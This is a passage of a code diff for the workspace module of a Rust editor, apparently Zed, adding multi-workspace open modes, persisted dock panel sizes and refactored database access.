PathPromptOptions, Point, PromptLevel, Render, ResizeEdge, Size, Stateful, Subscription, SystemWindowTabController, Task, Tiling, WeakEntity, WindowBounds, WindowHandle, WindowId, @@ -75,16 +80,19 @@ pub use pane_group::{ ActivePaneDecorator, HANDLE_HITBOX_SIZE, Member, PaneAxis, PaneGroup, PaneRenderContext, SplitDirection, }; -use persistence::{DB, SerializedWindowBounds, model::SerializedWorkspace}; +use persistence::{SerializedWindowBounds, model::SerializedWorkspace}; pub use persistence::{ - DB as WORKSPACE_DB, WorkspaceDb, delete_unloaded_items, - model::{ItemId, SerializedMultiWorkspace, SerializedWorkspaceLocation, SessionWorkspace}, - read_serialized_multi_workspaces, + WorkspaceDb, delete_unloaded_items, + model::{ + DockStructure, ItemId, MultiWorkspaceState, SerializedMultiWorkspace, + SerializedWorkspaceLocation, SessionWorkspace, + }, + read_serialized_multi_workspaces, resolve_worktree_workspaces, }; use postage::stream::Stream; use project::{ - DirectoryLister, Project, ProjectEntryId, ProjectPath, ResolvedPath, Worktree, WorktreeId, - WorktreeSettings, + DirectoryLister, Project, ProjectEntryId, ProjectGroupKey, ProjectPath, ResolvedPath, Worktree, + WorktreeId, WorktreeSettings, debugger::{breakpoint_store::BreakpointStoreEvent, session::ThreadStatus}, project_settings::ProjectSettings, toolchain_store::ToolchainStoreEvent, @@ -119,13 +127,14 @@ use std::{ process::ExitStatus, rc::Rc, sync::{ - Arc, LazyLock, Weak, + Arc, LazyLock, atomic::{AtomicBool, AtomicUsize}, }, time::Duration, }; use task::{DebugScenario, SharedTaskContext, SpawnInTerminal}; -use theme::{ActiveTheme, GlobalTheme, SystemAppearance, ThemeSettings}; +use theme::{ActiveTheme, SystemAppearance}; +use theme_settings::ThemeSettings; pub use toolbar::{ PaneSearchBarCallbacks, Toolbar, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, }; @@ -139,16 +148,16 @@ use util::{ }; use uuid::Uuid; pub use workspace_settings::{ - AutosaveSetting, BottomDockLayout, 
RestoreOnStartupBehavior, StatusBarSettings, TabBarSettings, - WorkspaceSettings, + AutosaveSetting, BottomDockLayout, FocusFollowsMouse, RestoreOnStartupBehavior, + StatusBarSettings, TabBarSettings, WorkspaceSettings, }; -use zed_actions::{Spawn, feedback::FileBugReport}; +use zed_actions::{Spawn, feedback::FileBugReport, theme::ToggleMode}; -use crate::{item::ItemBufferKind, notifications::NotificationId}; +use crate::{dock::PanelSizeState, item::ItemBufferKind, notifications::NotificationId}; use crate::{ persistence::{ SerializedAxis, - model::{DockData, DockStructure, SerializedItem, SerializedPane, SerializedPaneGroup}, + model::{DockData, SerializedItem, SerializedPane, SerializedPaneGroup}, }, security_modal::SecurityModal, }; @@ -205,6 +214,34 @@ pub trait DebuggerProvider { fn active_thread_state(&self, cx: &App) -> Option; } +/// Opens a file or directory. +#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] +#[action(namespace = workspace)] +pub struct Open { + /// When true, opens in a new window. When false, adds to the current + /// window as a new workspace (multi-workspace). + #[serde(default = "Open::default_create_new_window")] + pub create_new_window: bool, +} + +impl Open { + pub const DEFAULT: Self = Self { + create_new_window: true, + }; + + /// Used by `#[serde(default)]` on the `create_new_window` field so that + /// the serde default and `Open::DEFAULT` stay in sync. + fn default_create_new_window() -> bool { + Self::DEFAULT.create_new_window + } +} + +impl Default for Open { + fn default() -> Self { + Self::DEFAULT + } +} + actions!( workspace, [ @@ -250,8 +287,6 @@ actions!( NewSearch, /// Opens a new window. NewWindow, - /// Opens a file or directory. - Open, /// Opens multiple files. OpenFiles, /// Opens the current location in terminal. @@ -370,7 +405,12 @@ pub struct Save { pub save_intent: Option, } -/// Closes all items and panes in the workspace. +/// Moves Focus to the central panes in the workspace. 
+#[derive(Clone, Debug, PartialEq, Eq, Action)] +#[action(namespace = workspace)] +pub struct FocusCenterPane; + +/// Closes all items and panes in the workspace. #[derive(Clone, PartialEq, Debug, Deserialize, Default, JsonSchema, Action)] #[action(namespace = workspace)] #[serde(deny_unknown_fields)] @@ -616,25 +656,52 @@ impl From for i64 { } } -fn prompt_and_open_paths(app_state: Arc, options: PathPromptOptions, cx: &mut App) { +fn prompt_and_open_paths( + app_state: Arc, + options: PathPromptOptions, + create_new_window: bool, + cx: &mut App, +) { if let Some(workspace_window) = local_workspace_windows(cx).into_iter().next() { workspace_window .update(cx, |multi_workspace, window, cx| { let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| { - prompt_for_open_path_and_open(workspace, app_state, options, window, cx); + prompt_for_open_path_and_open( + workspace, + app_state, + options, + create_new_window, + window, + cx, + ); }); }) .ok(); } else { - let task = Workspace::new_local(Vec::new(), app_state.clone(), None, None, None, cx); + let task = Workspace::new_local( + Vec::new(), + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ); cx.spawn(async move |cx| { - let (window, _) = task.await?; + let OpenResult { window, .. 
} = task.await?; window.update(cx, |multi_workspace, window, cx| { window.activate_window(); let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| { - prompt_for_open_path_and_open(workspace, app_state, options, window, cx); + prompt_for_open_path_and_open( + workspace, + app_state, + options, + create_new_window, + window, + cx, + ); }); })?; anyhow::Ok(()) @@ -647,6 +714,7 @@ pub fn prompt_for_open_path_and_open( workspace: &mut Workspace, app_state: Arc, options: PathPromptOptions, + create_new_window: bool, window: &mut Window, cx: &mut Context, ) { @@ -656,13 +724,27 @@ pub fn prompt_for_open_path_and_open( window, cx, ); + let multi_workspace_handle = window.window_handle().downcast::(); cx.spawn_in(window, async move |this, cx| { let Some(paths) = paths.await.log_err().flatten() else { return; }; + if !create_new_window { + if let Some(handle) = multi_workspace_handle { + if let Some(task) = handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.open_project(paths, OpenMode::Activate, window, cx) + }) + .log_err() + { + task.await.log_err(); + } + return; + } + } if let Some(task) = this .update_in(cx, |this, window, cx| { - this.open_workspace_for_paths(false, paths, window, cx) + this.open_workspace_for_paths(OpenMode::NewWindow, paths, window, cx) }) .log_err() { @@ -680,40 +762,34 @@ pub fn init(app_state: Arc, cx: &mut App) { cx.on_action(|_: &CloseWindow, cx| Workspace::close_global(cx)) .on_action(|_: &Reload, cx| reload(cx)) - .on_action({ - let app_state = Arc::downgrade(&app_state); - move |_: &Open, cx: &mut App| { - if let Some(app_state) = app_state.upgrade() { - prompt_and_open_paths( - app_state, - PathPromptOptions { - files: true, - directories: true, - multiple: true, - prompt: None, - }, - cx, - ); - } - } + .on_action(|action: &Open, cx: &mut App| { + let app_state = AppState::global(cx); + prompt_and_open_paths( + app_state, + PathPromptOptions { + files: true, + directories: true, + 
multiple: true, + prompt: None, + }, + action.create_new_window, + cx, + ); }) - .on_action({ - let app_state = Arc::downgrade(&app_state); - move |_: &OpenFiles, cx: &mut App| { - let directories = cx.can_select_mixed_files_and_dirs(); - if let Some(app_state) = app_state.upgrade() { - prompt_and_open_paths( - app_state, - PathPromptOptions { - files: true, - directories, - multiple: true, - prompt: None, - }, - cx, - ); - } - } + .on_action(|_: &OpenFiles, cx: &mut App| { + let directories = cx.can_select_mixed_files_and_dirs(); + let app_state = AppState::global(cx); + prompt_and_open_paths( + app_state, + PathPromptOptions { + files: true, + directories, + multiple: true, + prompt: None, + }, + true, + cx, + ); }); } @@ -1022,7 +1098,7 @@ pub struct AppState { pub session: Entity, } -struct GlobalAppState(Weak); +struct GlobalAppState(Arc); impl Global for GlobalAppState {} @@ -1058,14 +1134,14 @@ struct Follower { impl AppState { #[track_caller] - pub fn global(cx: &App) -> Weak { + pub fn global(cx: &App) -> Arc { cx.global::().0.clone() } - pub fn try_global(cx: &App) -> Option> { + pub fn try_global(cx: &App) -> Option> { cx.try_global::() .map(|state| state.0.clone()) } - pub fn set_global(state: Weak, cx: &mut App) { + pub fn set_global(state: Arc, cx: &mut App) { cx.set_global(GlobalAppState(state)); } @@ -1091,7 +1167,7 @@ impl AppState { let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); let workspace_store = cx.new(|cx| WorkspaceStore::new(client.clone(), cx)); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&client, cx); Arc::new(Self { @@ -1185,6 +1261,7 @@ pub enum Event { ZoomChanged, ModalOpened, Activate, + PanelAdded(AnyView), } #[derive(Debug, Clone)] @@ -1289,6 +1366,11 @@ pub struct Workspace { scheduled_tasks: Vec>, last_open_dock_positions: Vec, removing: bool, + open_in_dev_container: bool, + _dev_container_task: Option>>, + _panels_task: Option>>, + 
sidebar_focus_handle: Option, + multi_workspace: Option>, } impl EventEmitter for Workspace {} @@ -1311,6 +1393,17 @@ struct FollowerView { location: Option, } +#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)] +pub enum OpenMode { + /// Open the workspace in a new window. + NewWindow, + /// Add to the window's multi workspace without activating it (used during deserialization). + Add, + /// Add to the window's multi workspace and activate it. + #[default] + Activate, +} + impl Workspace { pub fn new( workspace_id: Option, @@ -1330,10 +1423,10 @@ impl Workspace { |new_trusted_worktrees, cx| { let timeout = cx.background_executor().timer(SERIALIZATION_THROTTLE_TIME); + let db = WorkspaceDb::global(cx); cx.background_spawn(async move { timeout.await; - persistence::DB - .save_trusted_worktrees(new_trusted_worktrees) + db.save_trusted_worktrees(new_trusted_worktrees) .await .log_err(); }) @@ -1367,7 +1460,13 @@ impl Workspace { this.collaborator_left(*peer_id, window, cx); } - &project::Event::WorktreeRemoved(id) | &project::Event::WorktreeAdded(id) => { + &project::Event::WorktreeRemoved(_) => { + this.update_window_title(window, cx); + this.serialize_workspace(window, cx); + this.update_history(cx); + } + + &project::Event::WorktreeAdded(id) => { this.update_window_title(window, cx); if this .project() @@ -1567,8 +1666,13 @@ impl Workspace { let left_dock_buttons = cx.new(|cx| PanelButtons::new(left_dock.clone(), cx)); let bottom_dock_buttons = cx.new(|cx| PanelButtons::new(bottom_dock.clone(), cx)); let right_dock_buttons = cx.new(|cx| PanelButtons::new(right_dock.clone(), cx)); + let multi_workspace = window + .root::() + .flatten() + .map(|mw| mw.downgrade()); let status_bar = cx.new(|cx| { - let mut status_bar = StatusBar::new(¢er_pane.clone(), window, cx); + let mut status_bar = + StatusBar::new(¢er_pane.clone(), multi_workspace.clone(), window, cx); status_bar.add_left_item(left_dock_buttons, window, cx); status_bar.add_right_item(right_dock_buttons, 
window, cx); status_bar.add_right_item(bottom_dock_buttons, window, cx); @@ -1616,8 +1720,8 @@ impl Workspace { *SystemAppearance::global_mut(cx) = SystemAppearance(window_appearance.into()); - GlobalTheme::reload_theme(cx); - GlobalTheme::reload_icon_theme(cx); + theme_settings::reload_theme(cx); + theme_settings::reload_icon_theme(cx); }), cx.on_release({ let weak_handle = weak_handle.clone(); @@ -1659,6 +1763,7 @@ impl Workspace { left_dock, bottom_dock, right_dock, + _panels_task: None, project: project.clone(), follower_states: Default::default(), last_leaders_by_pane: Default::default(), @@ -1693,6 +1798,10 @@ impl Workspace { scheduled_tasks: Vec::new(), last_open_dock_positions: Vec::new(), removing: false, + sidebar_focus_handle: None, + multi_workspace, + open_in_dev_container: false, + _dev_container_task: None, } } @@ -1702,13 +1811,9 @@ impl Workspace { requesting_window: Option>, env: Option>, init: Option) + Send>>, + open_mode: OpenMode, cx: &mut App, - ) -> Task< - anyhow::Result<( - WindowHandle, - Vec>>>, - )>, - > { + ) -> Task> { let project_handle = Project::local( app_state.client.clone(), app_state.node_runtime.clone(), @@ -1720,6 +1825,8 @@ impl Workspace { cx, ); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.spawn(async move |cx| { let mut paths_to_open = Vec::with_capacity(abs_paths.len()); for path in abs_paths.into_iter() { @@ -1730,8 +1837,7 @@ impl Workspace { } } - let serialized_workspace = - persistence::DB.workspace_for_roots(paths_to_open.as_slice()); + let serialized_workspace = db.workspace_for_roots(paths_to_open.as_slice()); if let Some(paths) = serialized_workspace.as_ref().map(|ws| &ws.paths) { paths_to_open = paths.ordered_paths().cloned().collect(); @@ -1763,10 +1869,10 @@ impl Workspace { let workspace_id = if let Some(serialized_workspace) = serialized_workspace.as_ref() { serialized_workspace.id } else { - DB.next_id().await.unwrap_or_else(|_| Default::default()) + 
db.next_id().await.unwrap_or_else(|_| Default::default()) }; - let toolchains = DB.toolchains(workspace_id).await?; + let toolchains = db.toolchains(workspace_id).await?; for (toolchain, worktree_path, path) in toolchains { let toolchain_path = PathBuf::from(toolchain.path.clone().to_string()); @@ -1803,8 +1909,13 @@ impl Workspace { }); } + let window_to_replace = match open_mode { + OpenMode::NewWindow => None, + _ => requesting_window, + }; + let (window, workspace): (WindowHandle, Entity) = - if let Some(window) = requesting_window { + if let Some(window) = window_to_replace { let centered_layout = serialized_workspace .as_ref() .map(|w| w.centered_layout) @@ -1829,7 +1940,17 @@ impl Workspace { workspace }); - multi_workspace.activate(workspace.clone(), cx); + match open_mode { + OpenMode::Activate => { + multi_workspace.activate(workspace.clone(), window, cx); + } + OpenMode::Add => { + multi_workspace.add(workspace.clone(), &*window, cx); + } + OpenMode::NewWindow => { + unreachable!() + } + } workspace })?; (window, workspace) @@ -1845,7 +1966,7 @@ impl Workspace { // Reopening an existing workspace - restore its saved bounds (Some(bounds.0), Some(display)) } else if let Some((display, bounds)) = - persistence::read_default_window_bounds() + persistence::read_default_window_bounds(&kvp) { // New or empty workspace - use the last known window bounds (Some(bounds), Some(display)) @@ -1916,7 +2037,7 @@ impl Workspace { // 1. This is an empty workspace (no paths), AND // 2. 
The serialized workspace either doesn't exist or has no paths if is_empty_workspace && !serialized_workspace_has_paths { - if let Some(default_docks) = persistence::read_default_dock_state() { + if let Some(default_docks) = persistence::read_default_dock_state(&kvp) { window .update(cx, |_, window, cx| { workspace.update(cx, |workspace, cx| { @@ -1944,10 +2065,18 @@ impl Workspace { }); }) .log_err(); - Ok((window, opened_items)) + Ok(OpenResult { + window, + workspace, + opened_items, + }) }) } + pub fn project_group_key(&self, cx: &App) -> ProjectGroupKey { + self.project.read(cx).project_group_key(cx) + } + pub fn weak_handle(&self) -> WeakEntity { self.weak_self.clone() } @@ -1983,6 +2112,76 @@ impl Workspace { [&self.left_dock, &self.bottom_dock, &self.right_dock] } + pub fn capture_dock_state(&self, _window: &Window, cx: &App) -> DockStructure { + let left_dock = self.left_dock.read(cx); + let left_visible = left_dock.is_open(); + let left_active_panel = left_dock + .active_panel() + .map(|panel| panel.persistent_name().to_string()); + // `zoomed_position` is kept in sync with individual panel zoom state + // by the dock code in `Dock::new` and `Dock::add_panel`. 
+ let left_dock_zoom = self.zoomed_position == Some(DockPosition::Left); + + let right_dock = self.right_dock.read(cx); + let right_visible = right_dock.is_open(); + let right_active_panel = right_dock + .active_panel() + .map(|panel| panel.persistent_name().to_string()); + let right_dock_zoom = self.zoomed_position == Some(DockPosition::Right); + + let bottom_dock = self.bottom_dock.read(cx); + let bottom_visible = bottom_dock.is_open(); + let bottom_active_panel = bottom_dock + .active_panel() + .map(|panel| panel.persistent_name().to_string()); + let bottom_dock_zoom = self.zoomed_position == Some(DockPosition::Bottom); + + DockStructure { + left: DockData { + visible: left_visible, + active_panel: left_active_panel, + zoom: left_dock_zoom, + }, + right: DockData { + visible: right_visible, + active_panel: right_active_panel, + zoom: right_dock_zoom, + }, + bottom: DockData { + visible: bottom_visible, + active_panel: bottom_active_panel, + zoom: bottom_dock_zoom, + }, + } + } + + pub fn set_dock_structure( + &self, + docks: DockStructure, + window: &mut Window, + cx: &mut Context, + ) { + for (dock, data) in [ + (&self.left_dock, docks.left), + (&self.bottom_dock, docks.bottom), + (&self.right_dock, docks.right), + ] { + dock.update(cx, |dock, cx| { + dock.serialized_dock = Some(data); + dock.restore_state(window, cx); + }); + } + } + + pub fn open_item_abs_paths(&self, cx: &App) -> Vec { + self.items(cx) + .filter_map(|item| { + let project_path = item.project_path(cx)?; + self.project.read(cx).absolute_path(&project_path, cx) + }) + .collect() + } + pub fn dock_at_position(&self, position: DockPosition) -> &Entity { match position { DockPosition::Left => &self.left_dock, @@ -1991,6 +2190,197 @@ impl Workspace { } } + pub fn agent_panel_position(&self, cx: &App) -> Option { + self.all_docks().into_iter().find_map(|dock| { + let dock = dock.read(cx); + dock.has_agent_panel(cx).then_some(dock.position()) + }) + } + + pub fn panel_size_state(&self, cx: &App) -> 
Option { + self.all_docks().into_iter().find_map(|dock| { + let dock = dock.read(cx); + let panel = dock.panel::()?; + dock.stored_panel_size_state(&panel) + }) + } + + pub fn persisted_panel_size_state( + &self, + panel_key: &'static str, + cx: &App, + ) -> Option { + dock::Dock::load_persisted_size_state(self, panel_key, cx) + } + + pub fn persist_panel_size_state( + &self, + panel_key: &str, + size_state: dock::PanelSizeState, + cx: &mut App, + ) { + let Some(workspace_id) = self + .database_id() + .map(|id| i64::from(id).to_string()) + .or(self.session_id()) + else { + return; + }; + + let kvp = db::kvp::KeyValueStore::global(cx); + let panel_key = panel_key.to_string(); + cx.background_spawn(async move { + let scope = kvp.scoped(dock::PANEL_SIZE_STATE_KEY); + scope + .write( + format!("{workspace_id}:{panel_key}"), + serde_json::to_string(&size_state)?, + ) + .await + }) + .detach_and_log_err(cx); + } + + pub fn set_panel_size_state( + &mut self, + size_state: dock::PanelSizeState, + window: &mut Window, + cx: &mut Context, + ) -> bool { + let Some(panel) = self.panel::(cx) else { + return false; + }; + + let dock = self.dock_at_position(panel.position(window, cx)); + let did_set = dock.update(cx, |dock, cx| { + dock.set_panel_size_state(&panel, size_state, cx) + }); + + if did_set { + self.persist_panel_size_state(T::panel_key(), size_state, cx); + } + + did_set + } + + pub fn toggle_dock_panel_flexible_size( + &self, + dock: &Entity, + panel: &dyn PanelHandle, + window: &mut Window, + cx: &mut App, + ) { + let position = dock.read(cx).position(); + let current_size = self.dock_size(&dock.read(cx), window, cx); + let current_flex = + current_size.and_then(|size| self.dock_flex_for_size(position, size, window, cx)); + dock.update(cx, |dock, cx| { + dock.toggle_panel_flexible_size(panel, current_size, current_flex, window, cx); + }); + } + + fn dock_size(&self, dock: &Dock, window: &Window, cx: &App) -> Option { + let panel = dock.active_panel()?; + let 
size_state = dock + .stored_panel_size_state(panel.as_ref()) + .unwrap_or_default(); + let position = dock.position(); + + let use_flex = panel.has_flexible_size(window, cx); + + if position.axis() == Axis::Horizontal + && use_flex + && let Some(flex) = size_state.flex.or_else(|| self.default_dock_flex(position)) + { + let workspace_width = self.bounds.size.width; + if workspace_width <= Pixels::ZERO { + return None; + } + let flex = flex.max(0.001); + let opposite = self.opposite_dock_panel_and_size_state(position, window, cx); + if let Some(opposite_flex) = opposite.as_ref().and_then(|(_, s)| s.flex) { + // Both docks are flex items sharing the full workspace width. + let total_flex = flex + 1.0 + opposite_flex; + return Some((flex / total_flex * workspace_width).max(RESIZE_HANDLE_SIZE)); + } else { + // Opposite dock is fixed-width; flex items share (W - fixed). + let opposite_fixed = opposite + .map(|(panel, s)| s.size.unwrap_or_else(|| panel.default_size(window, cx))) + .unwrap_or_default(); + let available = (workspace_width - opposite_fixed).max(RESIZE_HANDLE_SIZE); + return Some((flex / (flex + 1.0) * available).max(RESIZE_HANDLE_SIZE)); + } + } + + Some( + size_state + .size + .unwrap_or_else(|| panel.default_size(window, cx)), + ) + } + + pub fn dock_flex_for_size( + &self, + position: DockPosition, + size: Pixels, + window: &Window, + cx: &App, + ) -> Option { + if position.axis() != Axis::Horizontal { + return None; + } + + let workspace_width = self.bounds.size.width; + if workspace_width <= Pixels::ZERO { + return None; + } + + let opposite = self.opposite_dock_panel_and_size_state(position, window, cx); + if let Some(opposite_flex) = opposite.as_ref().and_then(|(_, s)| s.flex) { + let size = size.clamp(px(0.), workspace_width - px(1.)); + Some((size * (1.0 + opposite_flex) / (workspace_width - size)).max(0.0)) + } else { + let opposite_width = opposite + .map(|(panel, s)| s.size.unwrap_or_else(|| panel.default_size(window, cx))) + 
.unwrap_or_default(); + let available = (workspace_width - opposite_width).max(RESIZE_HANDLE_SIZE); + let remaining = (available - size).max(px(1.)); + Some((size / remaining).max(0.0)) + } + } + + fn opposite_dock_panel_and_size_state( + &self, + position: DockPosition, + window: &Window, + cx: &App, + ) -> Option<(Arc, PanelSizeState)> { + let opposite_position = match position { + DockPosition::Left => DockPosition::Right, + DockPosition::Right => DockPosition::Left, + DockPosition::Bottom => return None, + }; + + let opposite_dock = self.dock_at_position(opposite_position).read(cx); + let panel = opposite_dock.visible_panel()?; + let mut size_state = opposite_dock + .stored_panel_size_state(panel.as_ref()) + .unwrap_or_default(); + if size_state.flex.is_none() && panel.has_flexible_size(window, cx) { + size_state.flex = self.default_dock_flex(opposite_position); + } + Some((panel.clone(), size_state)) + } + + pub fn default_dock_flex(&self, position: DockPosition) -> Option { + if position.axis() != Axis::Horizontal { + return None; + } + + let pane = self.last_active_center_pane.clone()?.upgrade()?; + Some(self.center.width_fraction_for_pane(&pane).unwrap_or(1.0)) + } + pub fn is_edited(&self) -> bool { self.window_edited } @@ -2007,10 +2397,29 @@ impl Workspace { let dock_position = panel.position(window, cx); let dock = self.dock_at_position(dock_position); + let any_panel = panel.to_any(); + let persisted_size_state = + self.persisted_panel_size_state(T::panel_key(), cx) + .or_else(|| { + load_legacy_panel_size(T::panel_key(), dock_position, self, cx).map(|size| { + let state = dock::PanelSizeState { + size: Some(size), + flex: None, + }; + self.persist_panel_size_state(T::panel_key(), state, cx); + state + }) + }); dock.update(cx, |dock, cx| { - dock.add_panel(panel, self.weak_self.clone(), window, cx) + let index = dock.add_panel(panel.clone(), self.weak_self.clone(), window, cx); + if let Some(size_state) = persisted_size_state { + 
dock.set_panel_size_state(&panel, size_state, cx); + } + index }); + + cx.emit(Event::PanelAdded(any_panel)); } pub fn remove_panel( @@ -2028,20 +2437,41 @@ impl Workspace { &self.status_bar } - pub fn set_workspace_sidebar_open(&self, open: bool, cx: &mut App) { - self.status_bar.update(cx, |status_bar, cx| { - status_bar.set_workspace_sidebar_open(open, cx); - }); + pub fn set_sidebar_focus_handle(&mut self, handle: Option) { + self.sidebar_focus_handle = handle; } pub fn status_bar_visible(&self, cx: &App) -> bool { StatusBarSettings::get_global(cx).show } + pub fn multi_workspace(&self) -> Option<&WeakEntity> { + self.multi_workspace.as_ref() + } + + pub fn set_multi_workspace( + &mut self, + multi_workspace: WeakEntity, + cx: &mut App, + ) { + self.status_bar.update(cx, |status_bar, cx| { + status_bar.set_multi_workspace(multi_workspace.clone(), cx); + }); + self.multi_workspace = Some(multi_workspace); + } + pub fn app_state(&self) -> &Arc { &self.app_state } + pub fn set_panels_task(&mut self, task: Task>) { + self._panels_task = Some(task); + } + + pub fn take_panels_task(&mut self) -> Option>> { + self._panels_task.take() + } + pub fn user_store(&self) -> &Entity { &self.app_state.user_store } @@ -2395,6 +2825,18 @@ impl Workspace { self.debugger_provider = Some(Arc::new(provider)); } + pub fn set_open_in_dev_container(&mut self, value: bool) { + self.open_in_dev_container = value; + } + + pub fn open_in_dev_container(&self) -> bool { + self.open_in_dev_container + } + + pub fn set_dev_container_task(&mut self, task: Task>) { + self._dev_container_task = Some(task); + } + pub fn debugger_provider(&self) -> Option> { self.debugger_provider.clone() } @@ -2547,9 +2989,20 @@ impl Workspace { Task::ready(Ok(callback(self, window, cx))) } else { let env = self.project.read(cx).cli_environment(cx); - let task = Self::new_local(Vec::new(), self.app_state.clone(), None, env, None, cx); + let task = Self::new_local( + Vec::new(), + self.app_state.clone(), + None, + 
env, + None, + OpenMode::Activate, + cx, + ); cx.spawn_in(window, async move |_vh, cx| { - let (multi_workspace_window, _) = task.await?; + let OpenResult { + window: multi_workspace_window, + .. + } = task.await?; multi_workspace_window.update(cx, |multi_workspace, window, cx| { let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| callback(workspace, window, cx)) @@ -2577,9 +3030,20 @@ impl Workspace { Task::ready(Ok(callback(self, window, cx))) } else { let env = self.project.read(cx).cli_environment(cx); - let task = Self::new_local(Vec::new(), self.app_state.clone(), None, env, None, cx); + let task = Self::new_local( + Vec::new(), + self.app_state.clone(), + None, + env, + None, + OpenMode::Activate, + cx, + ); cx.spawn_in(window, async move |_vh, cx| { - let (multi_workspace_window, _) = task.await?; + let OpenResult { + window: multi_workspace_window, + .. + } = task.await?; multi_workspace_window.update(cx, |multi_workspace, window, cx| { let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| callback(workspace, window, cx)) @@ -2599,7 +3063,6 @@ impl Workspace { self.project.read(cx).visible_worktrees(cx) } - #[cfg(any(test, feature = "test-support"))] pub fn worktree_scans_complete(&self, cx: &App) -> impl Future + 'static + use<> { let futures = self .worktrees(cx) @@ -2820,13 +3283,15 @@ impl Workspace { .spawn(cx, async move |cx| { // limit to 100 keystrokes to avoid infinite recursion. 
for _ in 0..100 { - let mut state = keystrokes.borrow_mut(); - let Some(keystroke) = state.queue.pop_front() else { - state.dispatched.clear(); - state.task.take(); - return; + let keystroke = { + let mut state = keystrokes.borrow_mut(); + let Some(keystroke) = state.queue.pop_front() else { + state.dispatched.clear(); + state.task.take(); + return; + }; + keystroke }; - drop(state); cx.update(|window, cx| { let focused = window.focused(cx); window.dispatch_keystroke(keystroke.clone(), cx); @@ -2841,6 +3306,10 @@ impl Workspace { } }) .ok(); + + // Yield between synthetic keystrokes so deferred focus and + // other effects can settle before dispatching the next key. + yield_now().await; } *keystrokes.borrow_mut() = Default::default(); @@ -2948,39 +3417,40 @@ impl Workspace { pub fn open_workspace_for_paths( &mut self, - replace_current_window: bool, + // replace_current_window: bool, + mut open_mode: OpenMode, paths: Vec, window: &mut Window, cx: &mut Context, - ) -> Task> { - let window_handle = window.window_handle().downcast::(); + ) -> Task>> { + let requesting_window = window.window_handle().downcast::(); let is_remote = self.project.read(cx).is_via_collab(); let has_worktree = self.project.read(cx).worktrees(cx).next().is_some(); let has_dirty_items = self.items(cx).any(|item| item.is_dirty(cx)); - let window_to_replace = if replace_current_window { - window_handle - } else if is_remote || has_worktree || has_dirty_items { - None - } else { - window_handle - }; + let workspace_is_empty = !is_remote && !has_worktree && !has_dirty_items; + if workspace_is_empty { + open_mode = OpenMode::Activate; + } + let app_state = self.app_state.clone(); cx.spawn(async move |_, cx| { - cx.update(|cx| { - open_paths( - &paths, - app_state, - OpenOptions { - replace_window: window_to_replace, - ..Default::default() - }, - cx, - ) - }) - .await?; - Ok(()) + let OpenResult { workspace, .. 
} = cx + .update(|cx| { + open_paths( + &paths, + app_state, + OpenOptions { + requesting_window, + open_mode, + ..Default::default() + }, + cx, + ) + }) + .await?; + Ok(workspace) }) } @@ -3185,7 +3655,7 @@ impl Workspace { .map(|wt| wt.read(cx).abs_path().as_ref().to_path_buf()) } - fn add_folder_to_project( + pub fn add_folder_to_project( &mut self, _: &AddFolderToProject, window: &mut Window, @@ -3663,6 +4133,14 @@ impl Workspace { did_focus_panel } + pub fn focus_center_pane(&mut self, window: &mut Window, cx: &mut Context) { + if let Some(item) = self.active_item(cx) { + item.item_focus_handle(cx).focus(window, cx); + } else { + log::error!("Could not find a focus target when switching focus to the center panes",); + } + } + pub fn activate_panel_for_proto_id( &mut self, panel_id: PanelId, @@ -3747,6 +4225,17 @@ impl Workspace { } } + /// Open the panel of the given type, dismissing any zoomed items that + /// would obscure it (e.g. a zoomed terminal). + pub fn reveal_panel(&mut self, window: &mut Window, cx: &mut Context) { + let dock_position = self.all_docks().iter().find_map(|dock| { + let dock = dock.read(cx); + dock.panel_index_for_type::().map(|_| dock.position()) + }); + self.dismiss_zoomed_items_to_reveal(dock_position, window, cx); + self.open_panel::(window, cx); + } + pub fn close_panel(&self, window: &mut Window, cx: &mut Context) { for dock in self.all_docks().iter() { dock.update(cx, |dock, cx| { @@ -4307,27 +4796,36 @@ impl Workspace { ) { use ActivateInDirectionTarget as Target; enum Origin { + Sidebar, LeftDock, RightDock, BottomDock, Center, } - let origin: Origin = [ - (&self.left_dock, Origin::LeftDock), - (&self.right_dock, Origin::RightDock), - (&self.bottom_dock, Origin::BottomDock), - ] - .into_iter() - .find_map(|(dock, origin)| { - if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() { - Some(origin) - } else { - None - } - }) - .unwrap_or(Origin::Center); - + let origin: Origin = if self + 
.sidebar_focus_handle + .as_ref() + .is_some_and(|h| h.contains_focused(window, cx)) + { + Origin::Sidebar + } else { + [ + (&self.left_dock, Origin::LeftDock), + (&self.right_dock, Origin::RightDock), + (&self.bottom_dock, Origin::BottomDock), + ] + .into_iter() + .find_map(|(dock, origin)| { + if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() { + Some(origin) + } else { + None + } + }) + .unwrap_or(Origin::Center) + }; + let get_last_active_pane = || { let pane = self .last_active_center_pane @@ -4345,7 +4843,20 @@ impl Workspace { let try_dock = |dock: &Entity| dock.read(cx).is_open().then(|| Target::Dock(dock.clone())); + let sidebar_target = self + .sidebar_focus_handle + .as_ref() + .map(|h| Target::Sidebar(h.clone())); + let target = match (origin, direction) { + // From the sidebar, only Right navigates into the workspace. + (Origin::Sidebar, SplitDirection::Right) => try_dock(&self.left_dock) + .or_else(|| get_last_active_pane().map(Target::Pane)) + .or_else(|| try_dock(&self.bottom_dock)) + .or_else(|| try_dock(&self.right_dock)), + + (Origin::Sidebar, _) => None, + // We're in the center, so we first try to go to a different pane, // otherwise try to go to a dock. 
